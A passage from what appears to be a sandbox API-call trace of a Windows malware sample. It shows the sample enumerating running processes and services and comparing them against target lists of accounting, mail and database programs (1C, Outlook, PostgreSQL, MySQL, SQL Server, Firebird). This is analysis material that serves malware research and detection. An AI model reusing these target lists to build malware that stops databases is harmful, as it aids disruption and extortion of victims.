(lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0266.776] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.777] lstrlenW (lpString="csrss.exe") returned 9 [0266.777] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.777] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.777] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.777] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.777] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.777] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.777] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.777] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0266.777] lstrlenW (lpString="wininit.exe") returned 11 [0266.777] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0266.777] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0266.777] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0266.778] lstrlenW (lpString="csrss.exe") returned 9 [0266.778] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0266.778] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0266.778] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0266.778] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0266.778] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0266.778] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0266.778] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0266.778] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0266.778] lstrlenW (lpString="winlogon.exe") returned 12 [0266.778] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0266.778] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0266.778] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0266.779] lstrlenW (lpString="services.exe") returned 12 [0266.779] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0266.779] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0266.779] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0266.779] lstrlenW (lpString="lsass.exe") returned 9 [0266.779] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0266.779] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0266.779] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0266.779] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0266.779] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0266.779] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0266.779] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0266.779] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0266.780] lstrlenW (lpString="lsm.exe") returned 7 [0266.780] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0266.780] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0266.780] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0266.780] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0266.780] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0266.780] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0266.780] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0266.780] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.780] lstrlenW (lpString="svchost.exe") returned 11 [0266.780] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.780] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.780] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.781] lstrlenW (lpString="svchost.exe") returned 11 [0266.781] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.781] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.781] lstrlenW (lpString="svchost.exe") returned 11 [0266.781] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.781] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.781] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.781] lstrlenW (lpString="svchost.exe") returned 11 [0266.782] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.782] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.782] lstrlenW (lpString="svchost.exe") returned 11 [0266.782] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.782] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.782] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0266.782] lstrlenW (lpString="audiodg.exe") returned 11 [0266.782] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0266.782] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0266.783] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0266.783] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0266.783] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0266.783] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0266.783] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0266.783] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.783] lstrlenW (lpString="svchost.exe") returned 11 [0266.783] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0266.783] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0266.783] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0266.783] lstrlenW (lpString="userinit.exe") returned 12 [0266.783] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0266.783] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0266.783] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0266.783] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0266.784] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0266.784] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0266.784] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0266.784] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0266.784] lstrlenW (lpString="explorer.exe") returned 12 [0266.784] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0266.784] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0266.784] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0266.784] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0266.784] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0266.784] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0266.784] lstrlenW (lpString="dwm.exe") returned 7 [0266.784] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.785] lstrlenW (lpString="svchost.exe") returned 11 [0266.785] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0266.785] lstrlenW (lpString="ivttvf.exe") returned 10 [0266.785] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0266.785] lstrlenW (lpString="spoolsv.exe") returned 11 [0266.785] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0266.786] lstrlenW (lpString="cmd.exe") returned 7 [0266.786] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0266.786] lstrlenW (lpString="svchost.exe") returned 11 [0266.786] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0266.786] lstrlenW (lpString="conhost.exe") returned 11 [0266.786] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0266.786] lstrlenW (lpString="taskhost.exe") returned 12 [0266.786] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0266.787] lstrlenW (lpString="reader_sl.exe") returned 13 [0266.787] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="AdobeARM.exe")) returned 1 [0266.787] lstrlenW (lpString="AdobeARM.exe") returned 12 [0266.787] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0266.787] lstrlenW (lpString="dllhost.exe") returned 11 [0266.787] Process32NextW (in: hSnapshot=0x138, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0266.788] CloseHandle (hObject=0x138) returned 1 [0266.788] Sleep (dwMilliseconds=0x1f4) [0267.459] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x619d58 [0267.628] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0267.633] GetLastError () returned 0xea [0267.633] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x652bd0 [0267.633] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x652bd0, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x652bd0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0267.639] CloseServiceHandle (hSCObject=0x619d58) returned 1 [0267.643] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0267.643] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.643] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0267.643] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0267.644] lstrlenW (lpString="AudioSrv") returned 8 [0267.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0267.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0267.644] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0267.644] lstrlenW (lpString="BFE") returned 3 [0267.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0267.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0267.644] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0267.644] lstrlenW (lpString="CscService") returned 10 [0267.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0267.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0267.644] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0267.644] lstrlenW (lpString="DcomLaunch") returned 10 [0267.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0267.644] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0267.644] lstrlenW (lpString="Dhcp") returned 4 [0267.644] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0267.644] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0267.644] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0267.644] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0267.644] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0267.645] lstrlenW (lpString="Dnscache") returned 8 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0267.645] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0267.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0267.645] lstrlenW (lpString="eventlog") returned 8 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0267.645] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0267.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0267.645] lstrlenW (lpString="EventSystem") returned 11 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0267.645] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0267.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0267.645] lstrlenW (lpString="gpsvc") returned 5 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0267.645] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0267.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0267.645] lstrlenW (lpString="lmhosts") returned 7 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0267.645] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0267.645] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0267.645] lstrlenW (lpString="MMCSS") returned 5 [0267.645] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0267.645] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0267.645] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0267.646] lstrlenW (lpString="nsi") returned 3 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0267.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0267.646] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0267.646] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0267.646] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0267.646] lstrlenW (lpString="PlugPlay") returned 8 [0267.646] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0267.646] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 